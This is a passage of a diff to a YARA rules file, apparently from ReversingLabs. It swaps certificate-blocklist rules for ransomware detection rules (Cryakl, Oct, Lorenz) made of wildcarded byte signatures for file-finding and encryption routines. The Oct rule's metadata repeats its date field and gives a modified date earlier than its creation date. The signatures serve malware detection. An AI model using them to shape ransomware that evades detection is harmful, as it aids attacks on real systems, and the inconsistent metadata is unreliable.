45 ?? 85 + C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 + 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 + ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 + C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 + F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F + 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? + ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? + B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 + } + $find_files_p3 = { + 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 + ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 81 7D ?? ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? FF 75 ?? 8B 5D + ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 + ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 + DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 + 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 + ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? + BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ?? + 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? A1 ?? ?? ?? ?? 50 + FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? + 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D + ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 + ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 68 + } + $find_files_p4 = { + FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? + ?? FF 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? + 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? + ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? + ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? B8 + ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? FF 75 ?? B9 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 + C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? + 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? + ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 + E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? + ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? + ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? + ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 + } + $find_files_p5 = { + 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? + ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? + 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 + E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? + 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? + 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ?? + ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? + 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 + 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D + 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 + ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 + E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 + DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 + } + $encrypt_files_p1 = { + B8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 + E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? + B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? + ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? + 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? + 83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? + ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? + 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 + C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 + 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? + ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D + } + $encrypt_files_p2 = { + 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? + ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 + ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? + 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D + ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? + ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SMACHNA PLITKA, TOV" and pe.signatures[i].serial=="69:22:bb:5d:e8:8e:41:27:e1:ac:69:69:e6:a1:99:f5" and 1552692162<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_73065Efa163B7901Fa1Ccb0A54E80540 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Cryakl : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Cryakl ransomware." author = "ReversingLabs" - id = "949f55a9-7aa0-50de-bb81-fed5d27c3d24" - date = "2023-11-08" - modified = "2023-11-08" + id = "5c668278-458e-5b13-83c4-63beab5249ed" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3270-L3286" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e420c37c04aa676c266a4c2c228063239815c173a83c39d426c5a674648f1934" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Cryakl.yara#L1-L64" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "51d50ab1ce021e2facbca3a35af372186287a8d69b66651c9804234a409d9932" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Cryakl" + tc_detection_factor = 5 importance = 25 + strings: + $enum_and_encrypt_files_1 = { + 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF + 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? + E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 83 E0 ?? 83 F8 ?? 75 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 92 ?? ?? ?? ?? + 84 C0 0F 84 ?? ?? ?? ?? FF 75 ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 + } + $enum_and_encrypt_files_2 = { + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? + ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? + C6 45 ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 52 ?? 8B D8 + 4B 85 DB 0F 8C ?? ?? ?? ?? 43 33 F6 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 8D ?? + ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B D6 8B 38 FF 57 ?? 8B + 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 75 ?? C6 45 ?? ?? + 46 4B 0F 85 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ?? + ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? + ?? 83 C0 ?? 83 D2 ?? 89 05 ?? ?? ?? ?? 89 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? + ?? ?? 8B 10 FF 92 ?? ?? ?? ?? 84 C0 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? + ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SOVA CONSULTANCY LTD" and pe.signatures[i].serial=="73:06:5e:fa:16:3b:79:01:fa:1c:cb:0a:54:e8:05:40" and 1548115200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (( all of ($enum_and_encrypt_files_*))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4842Afad00904Ed8C98811E652Ccb3B7 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Oct : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Oct ransomware." author = "ReversingLabs" - id = "f09723aa-85a6-5d96-a71e-94f0e0a0f23c" - date = "2023-11-08" - modified = "2023-11-08" + id = "e811a0ba-52df-5e88-ab71-df91d5cb584a" + date = "2024-10-29" + date = "2024-10-29" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3288-L3304" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2b5c7c13369c7b89f1ea5474de3644a12bf6412cb3fa8ade5b66de280fb10cbf" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Oct.yara#L1-L68" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3973794d6bf26eaa752cfc70a217c059a190c63a0dd92b06de7c0893d92d9e88" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 03 0B 07 18 73 ?? ?? ?? ?? 0C 73 + ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 04 06 + 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F + ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 19 6F ?? + ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? + ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 13 ?? 15 33 + ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? + 13 ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A + } + $find_files = { + 16 0A 38 ?? ?? ?? ?? 16 0B 2B ?? 02 06 9A 28 ?? ?? ?? ?? 2C ?? 02 06 9A 73 ?? ?? ?? ?? + 0C 08 72 ?? ?? ?? ?? 03 07 9A 28 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0D 09 13 ?? 16 13 ?? 2B + ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 05 28 ?? ?? ?? ?? 1E + 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? + 11 ?? 8E 69 32 ?? 07 17 58 0B 07 03 8E 69 32 ?? 06 17 58 0A 06 02 8E 69 3F ?? ?? ?? ?? + 2A + } + $collect_env_and_start_enc_proc = { + 19 8D ?? ?? ?? ?? 0B 07 16 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 17 1B + 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 18 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? + ?? 28 ?? ?? ?? ?? A2 07 1F ?? 8D ?? ?? ?? ?? 0C 08 16 72 ?? ?? ?? ?? A2 08 17 72 ?? ?? + ?? ?? A2 08 18 72 ?? ?? ?? ?? A2 08 19 72 ?? ?? ?? ?? A2 08 1A 72 ?? ?? ?? ?? A2 08 1B + 72 ?? ?? ?? ?? A2 08 1C 72 ?? ?? ?? ?? A2 08 1D 72 ?? ?? ?? ?? A2 08 1E 72 ?? ?? ?? ?? + A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 + 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? + 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? + ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? + ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 72 ?? ?? ?? ?? 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A + 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 72 ?? ?? ?? ?? 16 + 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\"VERY EXCLUSIVE LTD\"" and pe.signatures[i].serial=="48:42:af:ad:00:90:4e:d8:c9:88:11:e6:52:cc:b3:b7" and 1545177600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($collect_env_and_start_enc_proc) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5A59A686B4A904D0Fca07153Ea6Db6Cc : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Lorenz : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Lorenz ransomware." author = "ReversingLabs" - id = "018e511f-191d-5fd4-8ab0-0e5bbff44d58" - date = "2023-11-08" - modified = "2023-11-08" + id = "cc97dd15-d518-5d9f-9384-3dcf81e34e81" + date = "2022-10-24" + modified = "2022-10-24" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3306-L3322" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7597b2ba870ec58ac0786a97fb92956406fe019c81f6176cc1a581988d3a9632" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Lorenz.yara#L1-L252" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b8668fcc560d264c37e3fbb52d5a5f1223a282abd9e984b3109efe9ab454be9f" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Lorenz" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_v1_p1 = { + BE ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? A5 6A ?? 6A ?? 68 